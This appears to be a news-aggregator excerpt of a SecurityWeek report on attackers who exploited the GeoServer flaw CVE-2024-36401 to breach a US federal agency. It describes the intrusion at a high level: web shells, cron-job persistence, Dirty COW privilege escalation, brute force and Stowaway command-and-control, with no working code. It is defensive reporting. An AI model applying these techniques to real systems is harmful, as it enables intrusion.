"On each server, they uploaded (or attempted to upload) web shells such as China Chopper, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used living-off-the-land (LOTL) techniques,"
"On July 24, ten days after the bug was added to the KEV list, the threat actor exploited the same vulnerability in another GeoServer instance belonging to the same agency. The attackers dropped web shells and created cron jobs and user accounts to maintain persistence, and then attempted to escalate privileges, including by exploiting the Dirty COW vulnerability in the Linux kernel."
"The threat actor also used brute force attacks to obtain passwords allowing it to move laterally and elevate privileges, performed reconnaissance using readily available tools, downloaded payloads using PowerShell, and deployed the Stowaway multi-level proxy tool for command-and-control (C&C). The cyber threat actors remained undetected in the organization's environment for three weeks before the organization's SOC identified the compromise using their EDR tool,"
CVE-2024-36401 in GeoServer was exploited to compromise a federal civilian executive branch agency. A threat actor exploited the RCE flaw on July 11, 2024, gained access to a GeoServer instance, moved laterally to a web server and an SQL server, and uploaded web shells and remote-access scripts. On July 24 the same vulnerability was exploited in another GeoServer instance, with attackers creating cron jobs and user accounts and attempting privilege escalation including Dirty COW. The actor used brute-force, reconnaissance tools, PowerShell payloads, living-off-the-land techniques, and the Stowaway proxy for C2, remaining undetected for three weeks.
Read at SecurityWeek
Unable to calculate read time
Collection
[
|
...
]